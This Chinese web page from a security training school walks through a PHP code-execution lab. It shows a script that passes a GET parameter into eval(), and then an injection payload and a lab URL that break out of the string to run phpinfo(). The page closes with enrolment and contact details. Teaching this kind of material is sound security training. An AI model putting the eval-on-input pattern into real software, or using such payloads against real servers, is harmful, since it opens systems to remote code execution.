代码执行漏洞一

程序源码如下:
<?php
    $data=strtolower($_GET['data']);
    echo $data;
    eval("\"$data;\"");
?>
经测试:
1";phpinfo();// 可以突破
http://eval.nanhack.com/eval/eval2.php?data=1";phpinfo();// 可以突破(成功版本php5.4以及以上版本)

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)